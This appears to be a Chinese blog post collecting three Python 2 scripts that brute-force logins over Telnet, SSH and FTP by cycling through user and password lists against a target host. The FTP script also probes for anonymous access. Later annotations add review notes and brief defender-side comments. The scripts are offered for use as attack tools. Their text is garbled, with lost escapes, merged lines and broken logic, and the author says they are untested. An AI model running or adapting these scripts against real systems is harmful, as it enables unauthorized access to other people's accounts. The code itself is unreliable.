一些有用的Python脚本[bak]


Telnet爆破脚本:
#!usr/bin/python
#Telnet Brute Forcer
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com

import threading, time, random, sys, telnetlib
from copy import copy

# Require exactly three arguments after the script name: server, user list, word list.
if len(sys.argv) !=4:
	print "Usage: ./telnetbrute.py <server> <userlist> <wordlist>"
	sys.exit(1)

# Load both lists fully into memory. readlines() keeps each line's trailing
# newline; getword() strips it later with [:-1]. The file objects are never
# closed explicitly.
# NOTE(review): string literals on this page look like they lost their
# backslashes in extraction ("pathn" was presumably "path\n", "nt" "\n\t");
# they are left exactly as found.
try:
  	users = open(sys.argv[2], "r").readlines()
except(IOError):
  	print "Error: Check your userlist pathn"
  	sys.exit(1)

try:
  	words = open(sys.argv[3], "r").readlines()
except(IOError):
  	print "Error: Check your wordlist pathn"
  	sys.exit(1)

# Banner plus a summary of the target and the list sizes.
print "nt   d3hydr8[at]gmail[dot]com TelnetBruteForcer v1.0"
print "t--------------------------------------------------n"
print "[+] Server:",sys.argv[1]
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words),"n"

# Keep an untouched copy of the word list; reloader() refills `words` from it.
wordlist = copy(words)

def reloader():
	# Refill the shared `words` list from the untouched `wordlist` copy.
	# getword() calls this once `words` has been emptied.
	for word in wordlist:
		words.append(word)

def getword():
	# Return the next (password, user) pair from the module-level `words`
	# and `users` lists.
	#
	# NOTE(review): the Lock is created inside the call, so every caller
	# gets its own lock object and the acquire/release pair below does not
	# exclude other threads from the shared lists.
	lock = threading.Lock()
	lock.acquire()
	if len(words) != 0:
		# Pick one remaining word at random and remove it from the list.
		value = random.sample(words,  1)
		words.remove(value[0])

	else:
		# Word list is empty: refill it, pick a word (not removed this
		# time) and drop the current first user.
		print "nReloading Wordlist - Changing Usern"
		reloader()
		value = random.sample(words,  1)
		users.remove(users[0])

	lock.release()
	# [:-1] drops the last character of the line, i.e. the newline that
	# readlines() kept. When only one user is left it is returned unstripped;
	# presumably the last line of the file is assumed to have no trailing
	# newline -- confirm.
	if len(users) ==1:
		return value[0][:-1], users[0]
	else:
		return value[0][:-1], users[0][:-1]

# One thread per login attempt against the Telnet service on sys.argv[1].
#
# Defender's view: every attempt is a separate TCP connection carrying one
# login prompt exchange, and Telnet sends the user name and password in
# cleartext. Counting failed logins per source address, locking accounts
# after repeated failures, and retiring Telnet in favour of SSH are the
# usual counters to this pattern.
class Worker(threading.Thread):

	def run(self):
		# Take the next (password, user) pair from the shared lists.
		value, user = getword()
		try:
			print "-"*12
			print "User:",user,"Password:",value
			# telnetlib.Telnet(host) with no port argument uses the default
			# Telnet port.
			tn = telnetlib.Telnet(sys.argv[1])
			tn.read_until("login: ")
			tn.write(user + "n")
			# NOTE(review): `password` is not assigned anywhere in the visible
			# script; confirm against the original.
			if password:
					tn.read_until("Password: ")
					tn.write(value + "n")
			tn.write("lsn")
			tn.write("exitn")
			# read_all() blocks until the server closes the connection. The
			# success line below is printed whenever no exception was raised;
			# the server's reply is echoed but never inspected.
			print tn.read_all()
			print "tnLogin successful:",value, user
			tn.close()
			# `work` is the module-level name bound by the launch loop, i.e.
			# the most recently started Worker, not necessarily this thread.
			work.join()
			sys.exit(2)
		except:
			# Bare except: swallows every exception, including the SystemExit
			# raised by sys.exit(2) above, so failures of any kind are silent.
			pass

# Start one Worker thread per (word, user) combination, one second apart.
# The iteration count is computed once from the list sizes at this point;
# getword() shrinks both lists while the loop runs.
for I in range(len(words)*len(users)):
	work = Worker()
	work.start()
	time.sleep(1)
SSH的爆破脚本(比较罗嗦,待修改):
#!/usr/bin/env python
#-*-coding = UTF-8-*-
#[email protected]:dengyongkai
#[email protected]:blog.sina.com.cn/kaiyongdeng

import sys
import os
import time
#from threading import Thread

try:
    from paramiko import SSHClient
    from paramiko import AutoAddPolicy
except ImportError:
    print G+'''
    You need paramiko module.
	http://www.lag.net/paramiko/
    Debian/Ubuntu: sudo apt-get install aptitude
				 : sudo aptitude install python-paramikon'''+END
    sys.exit(1)

docs =  """
        	[*] This was written for educational purpose and pentest only. Use it at your own risk.
        	[*] Author will be not responsible for any damage!
        	[*] Toolname        : ssh_bf.py
        	[*] Author          : xfk
        	[*] Version         : v.0.2
        	[*] Example of use  : python ssh_bf.py [-T target] [-P port] [-U userslist] [-W wordlist] [-H help]
	"""


if sys.platform == 'linux' or sys.platform == 'linux2':
         clearing = 'clear'
else:
         clearing = 'cls'
os.system(clearing)


R = "33[31m";
G = "33[32m";
Y = "33[33m"
END = "33[0m"


def logo():
         print G+"n          		|---------------------------------------------------------------|"
         print "         		|                                                               |"
         print "         		|               blog.sina.com.cn/kaiyongdeng                    |"
         print "         		|                16/05/2012 ssh_bf.py v.0.2                     |"
         print "         		|                  SSH Brute Forcing Tool                       |"
         print "         		|                                                               |"
         print "         		|---------------------------------------------------------------|n"
         print " n      	        	[-] %sn" % time.ctime()
         print docs+END


def help():
	print Y+"		[*]-H 		--hostname/ip 		<>the target hostname or ip address"
	print "		[*]-P 		--port 			<>the ssh service port(default is 22)"
	print "		[*]-U 		--usernamelist 		<>usernames list file"
	print "		[*]-P 		--passwordlist 		<>passwords list file"
	print "		[*]-H 		--help 			<>show help information"
	print "		[*]Usage:python %s [-T target] [-P port] [-U userslist] [-W wordlist] [-H help]"+END
	sys.exit(1)

def BruteForce(hostname,port,username,password):
        '''
        Attempt one password login over SSH and report whether it connected.

        Returns the string 'ok' when SSHClient.connect() completes and 'error'
        when it raises anything. A rejected password, a refused connection and
        a protocol failure all map to 'error', so the caller cannot tell them
        apart.

        Defender's view: each call is one full SSH handshake followed by a
        single password attempt, which sshd typically records as a failed
        password for the user. Key-only logins (sshd PasswordAuthentication
        no), a low MaxAuthTries and per-source rate limiting are the usual
        counters.
        '''
        ssh = SSHClient()
        # AutoAddPolicy accepts any unknown host key without verification.
        ssh.set_missing_host_key_policy(AutoAddPolicy())
        try:
            # allow_agent=False and look_for_keys=False keep paramiko from
            # trying an SSH agent or local key files, so only the supplied
            # password is offered. timeout=None sets no connect timeout.
            ssh.connect(hostname, port, username, password, pkey=None, timeout = None, allow_agent=False, look_for_keys=False)
            status = 'ok'
            ssh.close()
        except Exception, e:
            # Every failure is collapsed into the same status string.
            status = 'error'
            pass
	return status


def makelist(file):
    '''
    Read a text file and return its lines as a list of strings.

    Each line has the two substrings passed to replace() removed before it
    is appended. NOTE(review): as shown these are 'n' and 'r', which would
    strip those letters; presumably the original used the newline and
    carriage-return escapes and the backslashes were lost in extraction --
    confirm.

    The parameter name shadows the builtin `file` inside this function.
    '''
    items = []

    # NOTE(review): both handlers only print and fall through, so `fd` is
    # unbound when the loop below runs after a failed open().
    try:
        fd = open(file, 'r')
    except IOError:
        # NOTE(review): the quoting on the next line looks damaged by the
        # same backslash loss; left as found.
        print R+'unable to read file '%s'' % file+END
        pass

    except Exception, e:
        print R+'unknown error'+END
        pass

    for line in fd.readlines():
        item = line.replace('n', '').replace('r', '')
        items.append(item)
    fd.close()
    return items

def main():
        logo()
#	print "hello wold"
        try:
                for arg in sys.argv:
                        if arg.lower() == '-t' or arg.lower() == '--target':
                                hostname = str(sys.argv[int(sys.argv[1:].index(arg))+2])
       		 	if arg.lower() == '-p' or arg.lower() == '--port':
       			 	port = sys.argv[int(sys.argv[1:].index(arg))+2]
                        elif arg.lower() == '-u' or arg.lower() == '--userlist':
                                userlist = sys.argv[int(sys.argv[1:].index(arg))+2]
                        elif arg.lower() == '-w' or arg.lower() == '--wordlist':
                                wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
                        elif arg.lower() == '-h' or arg.lower() == '--help':
                                help()
			elif len(sys.argv) <= 1:
                                help()
        except:
                print R+"[-]Cheak your parametars inputn"+END
                help()
        print G+"n[!] BruteForcing target ...n"+END
#        print "here is ok"
#        print hostname,port,wordlist,userlist
        usernamelist = makelist(userlist)
        passwordlist = makelist(wordlist)

        print Y+"[*] SSH Brute Force Praparing."
        print "[*] %s user(s) loaded." % str(len(usernamelist))
        print "[*] %s password(s) loaded." % str(len(passwordlist))
        print "[*] Brute Force Is Starting......."+END
	try:
        	for username in usernamelist:
        		for password in passwordlist:
				print G+"n[+]Attempt uaername:%s password:%s..." % (username,password)+END
                		current = BruteForce(hostname, port, username, password)
                        	if current == 'error':
					print R+"[-]O*O The username:%s and password:%s Is Disenbabled...n" % (username,password)+END
#                        		pass
                        	else:
                                	print G+"n[+] ^-^ HaHa,We Got It!!!"
                                	print "[+] username: %s" % username
                                	print "[+] password: %sn" % password+END
#                               	sys.exit(0)
	except:
		print R+"n[-] There Is Something Wrong,Pleace Cheak It."
		print "[-] Exitting.....n"+END
		raise
        print Y+"[+] Done.^-^n"+END
        sys.exit(0)


if __name__ == "__main__":
	main()
FTP的爆破脚本(比较罗嗦,待修改):
#!/usr/bin/env python
#-*-coding = utf-8-*-
#author:@xfk
#blog:@blog.sina.com.cn/kaiyongdeng
#date:@2012-05-08

import sys, os, time
from ftplib import FTP
docs = """
           [*] This was written for educational purpose and pentest only. Use it at your own risk.
           [*] Author will be not responsible for any damage!
           [*] Toolname : ftp_bf.py
           [*] Coder :
           [*] Version : 0.1
           [*] eample of use : python ftp_bf.py -t ftp.server.com -u usernames.txt -p passwords.txt
       """

if sys.platform == 'linux' or sys.platform == 'linux2':
    clearing = 'clear'
else:
    clearing = 'cls'
os.system(clearing)
R = "33[31m";
G = "33[32m";
Y = "33[33m"
END = "33[0m"
def logo():
    print G+"n |---------------------------------------------------------------|"
    print " | |"
    print " | blog.sina.com.cn/kaiyongdeng |"
    print " | 08/05/2012 ftp_bf.py v.0.1 |"
    print " | FTP Brute Forcing Tool |"
    print " | |"
    print " |---------------------------------------------------------------|n"
    print " n [-] %sn" % time.strftime("%X")
    print docs+END

def help():
    print R+"[*]-t, --target ip/hostname <> Our target"
    print "[*]-u, --usernamelist usernamelist <> usernamelist path"
    print "[*]-p, --passwordlist passwordlist <> passwordlist path"
    print "[*]-h, --help help <> print this help"
    print "[*]Example : python ftp_bf -t ftp.server.com -u username.txt -p passwords.txt"+END sys.exit(1)

def bf_login(hostname,username,password):
    """Open an FTP control connection, attempt one login and list the directory.

    Returns 1 when connect, login, listing and quit all complete without an
    exception.

    NOTE(review): login() is called with (hostname, username, password)
    positionally, while ftplib's FTP.login takes (user, passwd, acct) in
    that order -- the argument order does not line up; confirm against the
    original.

    Defender's view: each call is a separate control connection with one
    USER/PASS exchange, and plain FTP carries both in cleartext.
    """
    # sys.stdout.write("r[!]Checking : %s " % (p))
    # sys.stdout.flush()
    try:
        ftp = FTP(hostname)
        ftp.login(hostname,username, password)
        # retrlines() with no callback prints the listing to stdout.
        ftp.retrlines('list')
        ftp.quit()
        print Y+"n[!] w00t,w00t!!! We did it ! "
        print "[+] Target : ",hostname, ""
        print "[+] User : ",username, ""
        print "[+] Password : ",password, ""+END
        return 1
    # sys.exit(1)
    except Exception, e:
        # NOTE(review): the next line is several source lines run together
        # by extraction (a `pass`, a second except clause and its print).
        # The sys.exit(1) after it presumably belonged to the
        # KeyboardInterrupt handler -- confirm against the original.
        pass except KeyboardInterrupt: print R+"n[-] Exiting ...n"+END
    sys.exit(1)

def anon_login(hostname):
    """Check whether the FTP server accepts an anonymous login.

    Prints the result; nothing is returned. FTP.login() with no arguments
    uses ftplib's default anonymous user.

    Defender's view: an anonymous login that succeeds is a server
    configuration finding in its own right; disable anonymous access where
    it is not required.
    """
    try:
        print G+"n[!] Checking for anonymous login.n"+END
        # NOTE(review): two statements are run together on the next line,
        # presumably by extraction; left as found.
        ftp = FTP(hostname) ftp.login()
        ftp.retrlines('LIST')
        print Y+"n[!] w00t,w00t!!! Anonymous login successfuly !n"+END
        ftp.quit()
    except Exception, e:
        # Any failure (connection or login) is reported as a failed login.
        print R+"n[-] Anonymous login failed...n"+END
        pass

def main():
    """Parse the command line, load both lists and try every user/password pair.

    Runs the anonymous-login check first, then calls bf_login() for each
    combination and prints a per-attempt result line.
    """
    logo()
    # For each argv element that matches a flag, take the element after it
    # as that flag's value.
    # NOTE(review): hostname, usernamelist and passwordlist stay unbound
    # when their flag is absent; their first use is outside this try block.
    try:
        for arg in sys.argv:
            if arg.lower() == '-t' or arg.lower() == '--target':
                hostname = sys.argv[int(sys.argv[1:].index(arg))+2]
            elif arg.lower() == '-u' or arg.lower() == '--usernamelist':
                usernamelist = sys.argv[int(sys.argv[1:].index(arg))+2]
            elif arg.lower() == '-p' or arg.lower() == '--passwordlist':
                passwordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
            elif arg.lower() == '-h' or arg.lower() == '--help':
                help()
            elif len(sys.argv) <= 1:
                help()
    except:
        # Bare except: any parsing error ends in the help text.
        print R+"[-]Cheak your parametars inputn"+END
        help()

    print G+"[!] BruteForcing target ..."+END
    anon_login(hostname)
    # print "here is ok"
    # print hostname
    # Read the user list and strip surrounding whitespace from every line.
    # The file object is not closed.
    try:
        usernames = open(usernamelist, "r")
        user = usernames.readlines()
        count1 = 0
        while count1 < len(user):
            user[count1] = user[count1].strip()
            count1 +=1
    except:
        print R+"n[-] Cheak your usernamelist pathn"+END
        sys.exit(1)

    # print "here is ok ",usernamelist,passwordlist
    # Same for the password list.
    try:
        passwords = open(passwordlist, "r")
        pwd = passwords.readlines()
        count2 = 0
        while count2 < len(pwd):
            pwd[count2] = pwd[count2].strip()
            count2 +=1
    except:
        print R+"n[-] Check your passwordlist pathn"+END
        sys.exit(1)

    print G+"n[+] Loaded:",len(user),"usernames"
    print "n[+] Loaded:",len(pwd),"passwords"
    print "[+] Target:",hostname
    print "[+] Guessing...n"+END
    # NOTE(review): the two loop headers on the next line are run together,
    # presumably by extraction; left as found.
    for u in user: for p in pwd:
        result = bf_login(hostname,u.replace("n",""),p.replace("n",""))
        if result != 1:
            print G+"[+]Attempt uaername:%s password:%s..." % (u,p) + R+"Disenable"+END
        else:
            print G+"[+]Attempt uaername:%s password:%s..." % (u,p) + Y+"Enable"+END
        # As indented here, this runs inside the loop, once per attempt whose
        # result is falsy.
        if not result :
            print R+"n[-]There is no username ans password enabled in the list."
            print "[-]Exiting...n"+END

if __name__ == "__main__":
    main()

上面的3个脚本都还没有测试,等测试了之后把测试效果补充上。然后还有别的爆破脚本以后慢慢补充,不同的情况有不同的方法,要灵活运用!
